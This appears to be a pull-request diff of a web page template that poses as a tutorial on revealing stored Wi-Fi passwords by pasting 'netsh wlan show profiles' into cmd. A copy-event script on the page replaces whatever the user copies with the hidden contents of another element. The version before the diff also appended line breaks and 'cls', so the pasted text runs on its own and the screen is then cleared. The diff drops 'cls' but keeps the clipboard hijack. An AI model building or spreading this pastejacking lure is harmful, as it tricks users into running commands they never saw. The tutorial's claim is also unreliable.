Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
7 changes: 4 additions & 3 deletions templates/index.html
Original file line number Diff line number Diff line change
Expand Up @@ -63,17 +63,18 @@
<p class="command-text">
Today we will talk about how to view the Wi-Fi passwords stored on your device and how to display them
It's very simple. All you have to do is open cmd, copy and paste this text,
<span class="highlight">netsh wlan show profils</span>
<span class="highlight">netsh wlan show profiles</span>
and all your stored passwords will simply appear.
</p>
</div>

<script>
document.addEventListener('copy', function(e){
const visibleContent = document.getElementById('visibleContent');
const clipboardData = e.clipboardData || window.clipboardData;
const textToCopy = visibleContent.innerText;
const textToCopy = visibleContent.innerText;

clipboardData.setData('text/plain', textToCopy+'\r\n'+'cls'+'\r\n');
clipboardData.setData('text/plain', textToCopy);
e.preventDefault();
});
</script>
Expand Down